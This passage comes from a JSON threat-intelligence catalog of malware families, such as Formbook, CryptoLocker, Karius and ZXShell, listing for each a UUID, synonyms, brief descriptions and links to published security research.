"meta": {
"synonyms": [
"FALLCHILL",
"Manuscrypt"
],
"type": [],
"refs": [
"https://www.us-cert.gov/ncas/alerts/TA17-318B"
]
}
},
{
"uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791",
"value": "MBRlock",
"description": "This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.",
"meta": {
"synonyms": [
"DexLocker"
],
"type": [],
"refs": [
"http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html",
"https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/",
"https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100",
"https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d"
]
}
},
{
"uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864",
"value": "Erebus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/"
]
}
},
{
"uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295",
"value": "Sword",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "82c644ab-550a-4a83-9b35-d545f4719069",
"value": "BlackEnergy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
"https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
"https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/"
]
}
},
{
"uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c",
"value": "AdWind",
"description": "",
"meta": {
"synonyms": [
"JBifrost",
"JSocket",
"AlienSpy",
"UNRECOM",
"Frutas"
],
"type": [],
"refs": [
"https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/",
"http://malware-traffic-analysis.net/2017/07/04/index.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat",
"https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885",
"https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html"
]
}
},
{
"uuid": "84b30881-00bc-4206-8170-51705a8e26b1",
"value": "HideDRV",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf"
]
}
},
{
"uuid": "8378b417-605e-4196-b31f-a0c96d75aa50",
"value": "Formbook",
"description": "FormBook contains a unique crypter, RunPE, whose distinctive behavioral patterns can be used for detection. It was initially called \"Babushka Crypter\" by Insidemalware.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html",
"http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/",
"http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html",
"https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
"https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
"http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
"https://blog.talosintelligence.com/2018/06/my-little-formbook.html"
]
}
},
{
"uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3",
"value": "MPK",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
"https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
]
}
},
{
"uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f",
"value": "9002 RAT",
"description": "",
"meta": {
"synonyms": [
"McRAT",
"Hydraq"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
"https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315",
"http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/",
"https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
"https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
"https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures"
]
}
},
{
"uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996",
"value": "PetrWrap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/",
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/"
]
}
},
{
"uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311",
"value": "Buterat",
"description": "",
"meta": {
"synonyms": [
"spyvoltar"
],
"type": [],
"refs": [
"http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html"
]
}
},
{
"uuid": "e26579d9-1d93-4a3b-a41e-263254d85189",
"value": "EvilPony",
"description": "Privately modded version of the Pony stealer.",
"meta": {
"synonyms": [
"CREstealer"
],
"type": [],
"refs": [
"https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/",
"https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware",
"https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/"
]
}
},
{
"uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786",
"value": "KeRanger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html",
"https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html",
"http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/"
]
}
},
{
"uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126",
"value": "Troldesh",
"description": "",
"meta": {
"synonyms": [
"Shade"
],
"type": [],
"refs": [
"https://securelist.com/the-shade-encryptor-a-double-threat/72087/",
"https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/"
]
}
},
{
"uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047",
"value": "KHRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/",
"https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor"
]
}
},
{
"uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d",
"value": "Mocton",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98",
"value": "Stantinko",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/"
]
}
},
{
"uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06",
"value": "Ransoc",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles"
]
}
},
{
"uuid": "dd1408ac-e288-4389-87f3-7650706f1d51",
"value": "NexusLogger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/",
"https://twitter.com/PhysicalDrive0/status/842853292124360706"
]
}
},
{
"uuid": "fba088fb-2659-48c3-921b-12c6791e6d58",
"value": "Decebal",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157",
"https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf",
"https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html"
]
}
},
{
"uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144",
"value": "TinyLoader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0"
]
}
},
{
"uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9",
"value": "Cobra Carbon System",
"description": "",
"meta": {
"synonyms": [
"Carbon"
],
"type": [],
"refs": [
"https://github.com/hfiref0x/TDL",
"https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
"https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
"https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
"https://securelist.com/analysis/publications/65545/the-epic-turla-operation/"
]
}
},
{
"uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39",
"value": "HiddenLotus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/"
]
}
},
{
"uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460",
"value": "Umbreon",
"description": "",
"meta": {
"synonyms": [
"Espeon"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/",
"http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html"
]
}
},
{
"uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e",
"value": "Batel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2",
"value": "Locky Loader",
"description": "For lack of a better name, this is a VBS-based loader that was used at the beginning of 2018 to deliver win.locky.",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15",
"value": "ZXShell",
"description": "",
"meta": {
"synonyms": [
"Sensocode"
],
"type": [],
"refs": [
"https://github.com/smb01/zxshell",
"https://blogs.cisco.com/security/talos/opening-zxshell",
"https://blogs.rsa.com/cat-phishing/"
]
}
},
{
"uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe",
"value": "MacVX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html"
]
}
},
{
"uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228",
"value": "sykipot",
"description": "",
"meta": {
"synonyms": [
"getkys"
],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/sykipot-is-back",
"https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/",
"https://community.rsa.com/thread/185437",
"https://www.symantec.com/connect/blogs/sykipot-attacks"
]
}
},
{
"uuid": "0777cb30-534f-44bb-a7af-906a422bd624",
"value": "StealthAgent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
]
}
},
{
"uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0",
"value": "Upatre",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/",
"https://secrary.com/ReversingMalware/Upatre/"
]
}
},
{
"uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e",
"value": "Hamweq",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf"
]
}
},
{
"uuid": "42562c47-08e1-46bc-962c-28d1831d092b",
"value": "NetSupportManager RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.netsupportmanager.com/index.asp",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/",
"https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/"
]
}
},
{
"uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631",
"value": "Jolob",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html"
]
}
},
{
"uuid": "cfed10ed-6601-469e-a1df-2d561b031244",
"value": "WebC2-GreenCat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf",
"value": "Karius",
"description": "According to Check Point, Karius is a banking trojan in development, borrowing code from Ramnit and Vawtrack as well as Trickbot, and currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the C2 is in JSON format and encrypted with RC4 using a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions they were received from the C2.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://research.checkpoint.com/banking-trojans-development/",
"https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/"
]
}
},
{
"uuid": "d258de39-e351-47e3-b619-731c87f13d9c",
"value": "Alreay",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/sas/77908/lazarus-under-the-hood/"
]
}
},
{
"uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366",
"value": "Stresspaint",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/",
"https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/",
"https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/",
"https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/"
]
}
},
{
"uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e",
"value": "Scote",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/"
]
}
},
{
"uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af",
"value": "Equationgroup (Sorting)",
"description": "Rough collection of EQGRP samples, to be sorted",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://laanwj.github.io/2016/08/28/feintcloud.html",
"https://laanwj.github.io/2016/09/17/seconddate-cnc.html",
"https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html",
"https://laanwj.github.io/2016/08/22/blatsting.html",
"https://laanwj.github.io/2016/09/11/buzzdirection.html",
"https://laanwj.github.io/2016/09/23/seconddate-adventures.html",
"https://laanwj.github.io/2016/09/13/blatsting-rsa.html",
"https://laanwj.github.io/2016/09/01/tadaqueos.html",
"https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html"
]
}
},
{
"uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6",
"value": "CrypMic",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/",
"https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
]
}
},
{
"uuid": "38f57823-ccc2-424b-8140-8ba30325af9c",
"value": "Rokku",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4",
"value": "Zeus Sphinx",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/",
"https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/",
"https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/"
]
}
},
{
"uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49",
"value": "Locky (Decryptor)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "588fb91d-59c6-4667-b299-94676d48b17b",
"value": "MimiKatz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/gentilkiwi/mimikatz",
"https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
"http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
]
}
},
{
"uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275",
"value": "win.gandcrab",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
"https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
"https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
"https://isc.sans.edu/diary/23417"
]
}
},
{
"uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4",
"value": "FakeRean",
"description": "",
"meta": {
"synonyms": [
"Braviax"
],
"type": [],
"refs": [
"https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/",
"https://0x3asecurity.wordpress.com/2015/11/30/134260124544/",
"https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf"
]
}
},
{
"uuid": "de3aae04-130b-4c5f-b67c-03f872e76697",
"value": "Nexster Bot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/benkow_/status/789006720668405760"
]
}
},
{
"uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba",
"value": "Mosquito",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/",
"https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
]
}
},
{
"uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4",
"value": "Moker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://breakingmalware.com/malware/moker-part-2-capabilities/",
"https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/",
"https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/",
"http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network"
]
}
},
{
"uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3",
"value": "Zeus MailSniffer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034",
"value": "FantomCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/"
]
}
},
{
"uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128",
"value": "GearInformer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.rekings.com/ispy-customers/",
"https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html"
]
}
},
{
"uuid": "009db412-762d-4256-8df9-eb213be01ffd",
"value": "SslMM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "1ab17959-6254-49af-af26-d34e87073e49",
"value": "FirstRansom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/815949909648150528"
]
}
},
{
"uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41",
"value": "BernhardPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick"
]
}
},
{
"uuid": "261fd543-60e4-470f-af28-7a9b17ba4759",
"value": "iMuler",
"description": "",
"meta": {
"synonyms": [
"Revir"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html",
"https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/"
]
}
},
{
"uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e",
"value": "Kovter",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
"https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/"
]
}
},
{
"uuid": "996e73e9-b093-4987-9992-f52008e55b24",
"value": "Makadocs",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html",
"https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs"
]
}
},
{
"uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f",
"value": "Lethic",
"description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.malware-traffic-analysis.net/2017/11/02/index.html",
"http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html",
"https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/",
"http://resources.infosecinstitute.com/win32lethic-botnet-analysis/"
]
}
},
{
"uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322",
"value": "WndTest",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947",
"value": "Unidentified 034",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/"
]
}
},
{
"uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8",
"value": "Siggen6",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56",
"value": "ComradeCircle",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/816926371867926528"
]
}
},
{
"uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5",
"value": "Goodor",
"description": "",
"meta": {
"synonyms": [
"Fuerboos"
],
"type": [],
"refs": [
"https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
]
}
},
{
"uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49",
"value": "Tofsee",
"description": "",
"meta": {
"synonyms": [
"Gheg"
],
"type": [],
"refs": [
"https://www.cert.pl/en/news/single/tofsee-en/",
"https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/",
"https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/"
]
}
},
{
"uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d",
"value": "AdultSwine",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/"
]
}
},
{
"uuid": "c931dc7d-9373-4545-911c-ad5589670c40",
"value": "Morto",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html",
"https://www.f-secure.com/weblog/archives/00002227.html",
"https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A"
]
}
},
{
"uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce",
"value": "KrBanker",
"description": "",
"meta": {
"synonyms": [
"BlackMoon"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/",
"https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan",
"https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
"http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf"
]
}
},
{
"uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5",
"value": "WireLurker",
"description": "The iOS malware that is installed over USB by osx.wirelurker.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
]
}
},
{
"uuid": "3556df83-9772-40c7-b418-dc4a67b9c54f",
"value": "Unidentified 043",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "66b1094f-7779-43ad-a32b-a9414babcc76",
"value": "Szribi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel",
"https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html",
"https://www.secureworks.com/research/srizbi"
]
}
},
{
"uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7",
"value": "CryptoLocker",
"description": "CryptoLocker is a sophisticated piece of malware launched in late 2013. It targets the Windows operating system by encrypting all the files on the system using an RSA-2048 public key. To decrypt the files, the user has to pay a ransom (usually 300 USD/EUR) or 2 Bitcoins.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
"https://www.secureworks.com/research/cryptolocker-ransomware"
]
}
},
{
"uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c",
"value": "WebC2-AdSpace",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "982c3554-1df2-4062-8f32-f311940ad9ff",
"value": "TemptingCedar Spyware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware"
]
}
},
{
"uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c",
"value": "Cloud Duke",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.f-secure.com/weblog/archives/00002822.html"
]
}
},
{
"uuid": "94323b32-9566-450b-8480-5f9f53b57948",
"value": "taidoor",
"description": "",
"meta": {
"synonyms": [
"simbot"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
"https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
"http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html"
]
}
},
{
"uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833",
"value": "Tsifiri",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa",
"value": "CyberSplitter",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "feb6a5f6-32f9-447d-af9c-08e499457883",
"value": "Trump Bot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://paper.seebug.org/345/"
]
}
},
{
"uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0",
"value": "Carberp",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "f43a0e38-2394-4538-a123-4a0457096058",
"value": "Unidentified 025 (Clickfraud)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://malware-traffic-analysis.net/2016/05/09/index.html"
]
}
},
{
"uuid": "db755407-4135-414c-90e3-97f5e48c6065",
"value": "Winsloader",
